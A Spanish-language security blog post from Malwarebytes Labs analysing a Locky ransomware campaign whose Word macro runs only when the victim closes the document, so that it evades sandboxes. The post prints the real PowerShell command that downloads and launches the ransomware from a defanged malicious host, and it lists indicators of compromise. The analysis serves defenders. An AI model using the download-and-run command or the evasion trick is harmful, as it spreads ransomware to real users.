Locky ransomware agrega funcionalidad anti-sandbox (actualizada)


Posted: August 31, 2017 by Malwarebytes Labs
By Marcelo Rivero and Jérôme Segura


El ransomware Locky ha estado muy activo desde su regreso como lo documentamos anteriormente . Hay varias campañas diferentes de Locky que están activas al mismo tiempo, el más grande es el del identificador asociado ID 3 que viene con CÓDIGO malévolo que contiene archivos adjuntos .VBS o .JS.

El investigador de Malwarebytes, Marcelo Rivero, descubrió un truco documentado anteriormente con el troyano Dridex [1] empleado con un ID asociado de Locky 5 para evitar el análisis automatizado realizado a través de sandbox.

Los autores del malware han utilizado documentos de Office que contienen macros para ejecutarr sus cargas útiles durante algún tiempo, pero normalmente el código se ejecuta tan pronto como el usuario hace clic en el botón "Habilitar contenido". A efectos del análisis, muchos sandboxes de programas de seguridad tienen una configuración baja en varias aplicaciones y habilitan macros por defecto, lo que permite la captura automatizada de la carga útil malintencionada.

Golpea cuando menos lo esperas

Sin embargo, esta campaña de Locky en particular ya no se activa simplemente ejecutando la macro misma, sino que espera hasta que el documento falso de Word sea cerrado por el usuario antes para que comience a ejecutarr un conjunto de comandos.




“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile(‘http://newhostrcm[.]top/admin.php?f=1’, $env:APPDATA + ‘\sATTfJY.exe’); Start-Process $env:APPDATA’\sATTfJY.exe’;

La carga útil se descarga y se inicia desde la carpeta %appdata% seguida por una nota de rescate típica:


Implicaciones

Si bien no es una técnica sofisticada, sin embargo, ilustra la constante batalla del gato y el ratón entre atacantes y defensores. Comprobamos que en su forma actual, los documentos maliciosos probablemente presenten un comportamiento inofensivo en muchos sanboxes (bancos de arena) mientras siguen infectando a los usuarios finales que cierran lógicamente el archivo cuando se dan cuenta de que no hay nada que ver.

Malwarebytes bloquea este truco de "cerrar el documento":


En general, podemos mitigar esta amenaza en diferentes capas:






Indicadores comprometidos:

Word documents:

b613b1c80b27fb21cfc95fb9cd59b4bb64c9fda0651d5ca05b0b50f76b04c9f4
8ca111f79892cb445c44588f1ade817abcbb3f3e39971f0ef7891b90f09de1e9
23d51440e2325808add6a1e338c697adc10fc0fa6d2ae804cc94af3e725c34cf
Locky:

newhostrcm[.]top/admin.php?f=1
doctorfeelk[.]top/admin.php?f=1
47.89.250.152
7cdcb878bf9bf5bb48a0034b04969c74401b25a516078ffd7f721d8098b2a774
933bd8262a34770b06ebe64c800f98d68082c2929af69c3feae7dd4c2aa6a897